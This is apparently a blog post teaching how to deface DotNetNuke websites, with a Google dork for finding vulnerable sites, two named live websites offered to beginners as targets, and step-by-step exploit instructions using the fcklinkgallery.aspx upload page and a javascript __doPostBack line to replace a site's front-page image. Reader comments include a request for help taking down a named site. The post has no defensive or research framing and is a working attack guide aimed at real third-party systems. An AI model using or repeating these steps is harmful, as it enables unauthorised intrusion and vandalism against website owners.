Posts
Hack Website Using DNN [Dot Net Nuke] Exploit
Using google DORK try to find the vulnerable website.
inurl:"/portals/0"
You can also modify this google dork according to your need & requirement
I have found these 2 website vulnerable to this attack:
http://www.wittur.se/
http://www.bsd405.org/
n00bs can also try both of these websites for testing purpose.
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg
Waaooo it means this
website is vulnerable and we can change the front page pic. Now the
current image name is SHM.jpg. Rename the new image as SHM.jpg which
you want to upload as a proof of you owned the system.
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Simply copy paste it as shown below:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload
Selected File. Now select you image file which you have renamed as
SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.
Chinese
French
German
Italian
Japanese
Korean
Russian
Spanish
i would like to hack this site www.kotawinters.tk and kotawinters.com (one owner only and one target to destroy the good) to deactivate or eliminate it in the web for it spread evil, can you help me to do this although I know hacking is not good and i do not have money to pay you.
ReplyDeletepls disregard my request (sigh)...I will just pray hard to deactivate that evil sites. thanks.
ReplyDelete